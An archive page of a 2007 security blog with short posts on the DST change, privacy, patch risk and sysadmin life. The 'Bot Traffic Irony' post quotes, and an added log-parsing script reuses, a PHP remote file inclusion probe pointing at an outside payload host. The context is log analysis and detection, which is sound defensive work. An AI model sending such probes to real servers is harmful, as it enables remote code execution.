Ramblings Archives

March 7, 2007

Tired of the DST Change? Ya, me too.


You know the new DST change has gone too far when your building management sends out a memo reminding you to upgrade your systems and patch your applications.

I came across an interesting paper this evening, found at the bottom of this page: http://www.energy.ca.gov/daylightsaving.html

Dr. Adrienne Kandal, with the California Energy Commission's Demand Analysis Office, has written a paper titled Electricity Savings From Early Daylight Saving Time, Commission publication # CEC-200-2007-001. She concluded that, "There is no clear evidence that electricity will be saved from the earlier start to daylight saving time on March 11, 2007..."

Check out the entire report.
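The memo's "patch your systems" reminder is checkable. The following Python script is an added example written for this page (not code from the post or from the Energy Commission): it computes the 2007 US DST start and end dates under the old rule (first Sunday in April to last Sunday in October) and the new one (second Sunday in March to first Sunday in November), counts the days on which an unpatched clock disagrees with a patched one, and, if the host has a zoneinfo database, checks whether the installed tz data already applies DST at noon on the new-rule start date. The zone name and the noon probe time are choices made for the example.

```python
import calendar
from datetime import date, datetime, timedelta

SUNDAY = 6  # datetime.weekday(): Monday == 0 ... Sunday == 6


def nth_weekday(year, month, weekday, n):
    """Date of the n-th given weekday in a month (n == -1 means the last one)."""
    if n == -1:
        last = date(year, month, calendar.monthrange(year, month)[1])
        return last - timedelta(days=(last.weekday() - weekday) % 7)
    first = date(year, month, 1)
    return first + timedelta(days=(weekday - first.weekday()) % 7 + 7 * (n - 1))


def us_dst_window(year, rule):
    """(start, end) dates of US daylight saving time under the old or the 2007 rule."""
    if rule == "pre2007":   # first Sunday in April .. last Sunday in October
        return nth_weekday(year, 4, SUNDAY, 1), nth_weekday(year, 10, SUNDAY, -1)
    if rule == "2007":      # second Sunday in March .. first Sunday in November
        return nth_weekday(year, 3, SUNDAY, 2), nth_weekday(year, 11, SUNDAY, 1)
    raise ValueError(f"unknown rule {rule!r}")


def disagreement_days(year):
    """Days on which an unpatched (old-rule) clock is one hour off from a patched one."""
    old_start, old_end = us_dst_window(year, "pre2007")
    new_start, new_end = us_dst_window(year, "2007")
    return (old_start - new_start).days + (new_end - old_end).days


def zone_observes_new_rule(tzname, year=2007):
    """True if the installed tz database applies DST at noon on the new-rule start date.

    Returns None when no zoneinfo data is available for the zone (nothing to check).
    The zone name is whatever the caller wants to verify; it is an example input here.
    """
    try:
        from zoneinfo import ZoneInfo
        tz = ZoneInfo(tzname)
    except Exception:
        return None
    start, _ = us_dst_window(year, "2007")
    probe = datetime(year, start.month, start.day, 12, tzinfo=tz)  # noon local, start day
    return probe.dst() not in (None, timedelta(0))


if __name__ == "__main__":
    for rule in ("pre2007", "2007"):
        print(rule, *us_dst_window(2007, rule))
    print("days of disagreement in 2007:", disagreement_days(2007))
    print("America/Los_Angeles patched:", zone_observes_new_rule("America/Los_Angeles"))
```

The interesting number is the 28 days (21 in March/April, 7 in October/November) during which any system still on the old rule stamps its logs an hour off; that is the window in which event correlation between patched and unpatched hosts silently breaks.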

March 19, 2007

XBOX Live Account Thefts

Kevin Finisterre on the FD mailing list has provided us with two good posts regarding Xbox Live accounts apparently being stolen. So far, I haven't found any compelling evidence either way that this has or hasn't happened. Likewise, nobody seems to have posted a proof of concept or really taken credit. Seems that we are in limbo. Let's hope that MS isn't covering this up. If so, we can probably all expect the "we are _really_ sorry" speech.

While we are on this topic, I'd like to remind you all about one of my 2007 predictions, where I call for stronger identity mechanisms for online gaming. Not only are we paying money for these online games, but they also make many people money. The services that companies like Microsoft, Sony and Linden provide are a market and need to be treated as such.


March 21, 2007

Beware the change in your personal privacy stance

College, Computer Science major. The tool of choice: an expensive HP calculator. The first thing I did was engrave my name and driver's license number on the back. Certainly that would thwart the threat of theft. Fast forward a few months to summer break, where I was returning to contract work with TK (of course we didn't call him TK back then). On day one of my return to the software company, I trudged into work with that calculator safely tucked away in my backpack. My plan? To show it off to TK. He'd be so enthralled, so interested to see such a cool gadget. With the corners of my mouth pointing to the sky:

"Hey dude, check out this calculator I've been using at college."
TK: "Wow, this thing is nuts". After a few minutes of key pressing, he flips it over. "Um, hey dude, nice disclosure of privacy there."
"What are you talking about?" I inquire.
TK points out my flaw, "You've posted your name and driver's license number for all the world to see. Not to mention, I kind of doubt that this will thwart a theft or even help you recover it if it were stolen."

I guess he was right. What a dork. Not only did I knowingly disclose my own information, but I also managed to deface my cool calculator in the process. So much for trying to resell it later.

Back in October, I posted an intentionally humorous question about how each of you protects your own privacy. Truth be told, these are part of my own list of personal privacy security measures. (No, I don't wear tin foil undergarments.) I learned an important lesson in those days working for TK. One might say he unintentionally molded me into a "security nut". I became a new person, or rather changed into just a phantom. You would have been hard pressed to find me at all.

I enjoy reading Jaron Lanier. He is one of those scientists and authors who make sense by stating the obvious. Or rather, it may not have been obvious to you until you read it. In his ongoing line of writings regarding groupthink and the Internet, he comments on anonymity and how it affects collective communities like Wikipedia, YouTube and MySpace. "Beware the online collective" is his recent publication from December 2006. I read the piece and quietly said my typical response, "Well, duh". This short essay has been stuck in my head since December. It was not until now that I knew why.

Like many people, I have profiles on many of the popular community sites. On all but one of these accounts I use a pseudonym. I'm probably not unlike many other people who either don't trust the company running the site, or simply would like to participate, but in private. A lurker of sorts. I haven't changed my identity, nor am I anonymous. I'm just sitting there like a SPAN port.

Amy Bruckman is another one of my valued researchers and authors. A long time ago, I used to help run a MOO. She became famous to me at that time as she was using the online community of MOOs to understand human psyche in the online world. One of her findings, poorly paraphrased, is that persons with online identities eventually become themselves again online. As hard as we try to build a different persona, or even change gender online, we eventually return to our true selves.

Well, as it turns out, Jaron and Amy are correct. I'm one of those anonymous persons participating in the mass groupthink revolution. And yes, you'll discover I have a different identity. Not even my best friends know my MySpace profile name. Times have changed, however.

Today is a different day. You might say I exist again. There is my picture on our blog and it's not so difficult to find me in Google. Being a real person again online is refreshing. I learned that if you want to enact change, you can't do so from behind the curtain. More importantly, if you buy an expensive calculator, don't engrave your driver's license number on it.

I still own that calculator.

March 30, 2007

Patch, upgrade, hotfix -- it's all risk

# /usr/bin/patch < 20070330.diff
Besides being a sturdy piece of denim saying "Keep on truckin'" that your mom would have sewn over your holey jeans, a patch is also a Unix program, a fix, and a problem solution. The upgrade, however, is generally associated with an improvement, an increase, an enhancement or an update.

I asked around, "What's a patch compared to an upgrade?"

The upgrade is generally considered more invasive, larger and higher risk. It may or may not have a big reward. The reason for the upgrade may be external or internal, feature-centric or security-related. Operationally, an upgrade requires a greater amount of testing and planning, and more complete change control procedures.

Patching is viewed as a smaller change. Only one or a few very specific variables are altered. The risk is generally considered low, but with a high reward, as the problem at hand will be quickly fixed. Patches are generally installed with less testing and often are implemented during a normal change window.

Is the patch an upgrade? Are these terms inclusive, exclusive and do we care?

Don't both a patch and an upgrade represent the same operational risk?

The perception is seemingly clear: call something a patch and it will get rolled out quicker than an upgrade. Case in point, here at nCircle. Our internal Information Technology Patch Tuesday SLA is 8 hours: the IT team has agreed to test and ready "patches" for deployment within 8 hours of their release. In general, the acceptance and installation of said patches throughout the organization follows less than 24 hours later. The net is that within 24 hours of Patch Tuesday, we have nearly 100% of all endpoints patched. Now compare Patch Tuesday with the end of life for FreeBSD 4.11. FreeBSD 4.11 was our IT-sanctioned Unix server common operating environment. Version 4.11 went end of life on January 31st, 2007. Even with more than 6 months of notices and hands-on help, we still have business units that haven't been able to fully migrate.

Sure, the "upgrade" from 4.11 to 6.x is much more complicated than a "patch", but there is more at hand. There is hesitancy and procrastination. For most, the upgrade of FreeBSD is perceived as painful and with little reward. Meanwhile, installing a few Microsoft patches is easy and comes with a big security reward.

Change == Risk

One would think that any change at all represents risk. Patch or upgrade, both introduce change. It's not our job to be risk averse, but to be risk managers. Are we doing our users a disservice by calling anything a patch? What if we called it "Change Tuesday"? I guess that's better than "Time to introduce risk to your computer in hopes of being able to better manage risk at some unknown point in the future so I don't lose my job".

April 5, 2007

Bot Traffic Irony

Put your trust in us

That is a direct quote from a website hosting malicious PHP payloads. This is a real story of irony. I laughed; I cried. Here we go.

Enter a publicly facing Unix system.
For whatever reason, it has SSH bound to a ton of ports, including 80 and 443.
The sysadmin reviews the logs daily.
What have we got today?
Look it's more PHP botnet traffic hitting port 80.
Silly bot, that's SSH bound to port 80.

Let's take a look at a log snippet:

Apr 4 00:00:00 serverName sshd[93113]: Bad protocol version identification 'GET /PNC/modules/vWar_Account/includes/functions_common.php?vwar_root2= http://www.foo.com/safe' from x.x.x.x

Nothing to see here, move along, move along.
Just for fun, the sysadmin points his browser to www.foo.com/safe.
Nothing new here either; it's a standard PHP system() call.
For even more fun, let's see what else is hosted at www.foo.com.
It's a brochure website for a locksmith.
Their marketing tag line:

ALLOW US TO TAKE AWAY YOUR SECURITY PROBLEMS.

PUT YOUR TRUST IN US.

YOU WON'T BE DISAPPOINTED.

Maybe they specialize in bump keys?

(Picture is a screen shot snippet from the website. Real identities masked to protect the poor locksmith who probably has no idea what I'm talking about)
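The daily log review above is easy to automate. What follows is an added example for this page, not code from the post or from nCircle: a small Python parser for OpenSSH's "Bad protocol version identification" message that pulls out the client's first bytes and, when they look like an HTTP request, checks the query string for a parameter whose value is a remote URL, the signature of a PHP remote file inclusion probe like the vwar_root2 one in the snippet. The sample log lines are constructed for the example (RFC 5737 addresses, made-up hosts and paths); only the sshd message format is real, and the regex also accepts the newer variant that appends "port N".

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (not real traffic) in the shape of OpenSSH's
# "Bad protocol version identification" message; the last line is a normal
# login that the parser must ignore.
SAMPLE_LOG = """\
Apr  4 00:00:00 serverName sshd[93113]: Bad protocol version identification 'GET /PNC/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://www.foo.com/safe' from 192.0.2.10
Apr  4 00:00:05 serverName sshd[93120]: Bad protocol version identification '\\026\\003\\001' from 192.0.2.11 port 44120
Apr  4 00:00:09 serverName sshd[93131]: Bad protocol version identification 'GET / HTTP/1.0' from 192.0.2.12
Apr  4 00:01:12 serverName sshd[93140]: Accepted publickey for admin from 198.51.100.7 port 51022 ssh2
"""

BAD_BANNER_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"Bad protocol version identification '(?P<banner>.*)' from (?P<ip>\S+)(?: port (?P<port>\d+))?$"
)
HTTP_REQUEST_RE = re.compile(r"^(?P<method>GET|POST|HEAD) (?P<target>\S+)(?: HTTP/\d\.\d)?$")
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def classify_banner(banner):
    """Return (kind, detail) for the client's first bytes as logged by sshd."""
    m = HTTP_REQUEST_RE.match(banner)
    if not m:
        return "other", {}                       # TLS hello, scanner junk, typo'd client ...
    parts = urlsplit(m.group("target"))
    detail = {"method": m.group("method"), "path": parts.path}
    # An RFI probe puts a URL in a query parameter (vwar_root2 here) and hopes the
    # targeted PHP script will include() it; flag any parameter whose value is a URL.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if value.lower().startswith(REMOTE_SCHEMES):
                detail.update({"param": name, "include_url": value})
                return "rfi_probe", detail
    return "http_probe", detail


def analyze(log_text):
    """Parse every bad-banner line into a dict; lines of any other shape are skipped."""
    events = []
    for line in log_text.splitlines():
        m = BAD_BANNER_RE.match(line)
        if not m:
            continue
        kind, detail = classify_banner(m.group("banner"))
        events.append({"ts": m.group("ts"), "src_ip": m.group("ip"), "pid": int(m.group("pid")),
                       "kind": kind, "banner": m.group("banner"), **detail})
    return events


def rfi_probes(log_text):
    """Only the events worth a second look: requests trying to include a remote file."""
    return [e for e in analyze(log_text) if e["kind"] == "rfi_probe"]


if __name__ == "__main__":
    for e in analyze(SAMPLE_LOG):
        print(e["ts"], e["src_ip"], e["kind"], e.get("include_url", ""))
```

The include_url field is what the sysadmin in the story browsed to by hand; in practice it is the value to feed to a blocklist or a sandbox, while the source address is just another infected host in the botnet and rarely worth chasing.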

April 9, 2007

Blogger's Code of Conduct Won't Fix the Problem

Tim O'Reilly, we don't need more rules. People just need to be educated.

In light of recent death threats to Kathy Sierra and the unfortunate outcome of her situation, Tim O'Reilly and others have put forth a draft of the Bloggers Code of Conduct. I once met Tim and he's a nice guy. Like any good geek I'm enamored with O'Reilly books, but more rules aren't the fix.

This might sound strange coming from a career IT guy. To live in IT, you need rules and procedures. What's more, you need people to follow them. The way we get people to follow rules is not by imposing more; it's by education. The code of conduct isn't exactly rules, but more akin to how I agree to act and how I expect others to act on the Internet. Well, guess what? It already exists. It's called RFC 1855.

I've already called attention to RFC 1855 on this blog. It is something that everyone should read. Granted, it needs some updating for terminology and technology. However, the basis on which it rests and the ideologies it supports are still valid.

Scoble responded to O'Reilly's post. In his response he noted something important that many people don't understand.

Second, I engage with my trolls. Why? Cause if they show up here I think they deserve an answer and I find they often get me to think deeper about the topic that I'm writing about than if we didn't engage in a little gutter wrestling.

I absolutely agree. Those who disagree with you should be invited to the conversation. None of us are all knowing. The act of disagreeing furthers the topic. Sometimes having to explain your position to a naysayer will force you to review your own opinion. At worst, you'll be back to the same conclusion. At best, you'll have a new understanding of which you can put in your toolbox for another day.

Let's turn our attention to something more productive: education. Spend a few minutes each week educating your user base. Instead of slapping someone for using an easy password, educate him or her on why the policy exists. Don't create more rules when rules are being broken. Get to the root of the problem. Spend time with your users. Let them complain and allow yourself to listen. Before conduct gets out of hand, pull out RFC 1855. Let it be a course in history and manners.

July 26, 2007

Sysadmin Day

Friday July 27th is Sysadmin Day.

Actual things I've heard said to a sysadmin....(yes, for real):

So my printer hums when it's printing. You need to get me a new one.
You need to get over this whole password thing.
Since you don't do anything important around here, how about faxing this for me?
Awesome Star Trek action figures... I bought this new computer for my wife, I need you to ...
Don't worry, I wrote my password on a piece of paper and put it under my keyboard.
My old school mate sent me an e-greeting and now my computer is doing weird stuff.
I don't know what happened, all my files are gone and I have a presentation in 5 minutes.
Nothing, not a thing; I didn't install anything or make any changes.


About Ramblings

This page contains an archive of all entries posted to Sync in the Ramblings category. They are listed from oldest to newest.

In The News is the previous category.

Risk Metrics is the next category.

Many more can be found on the main index page or by looking through the archives.

Powered by Movable Type 3.33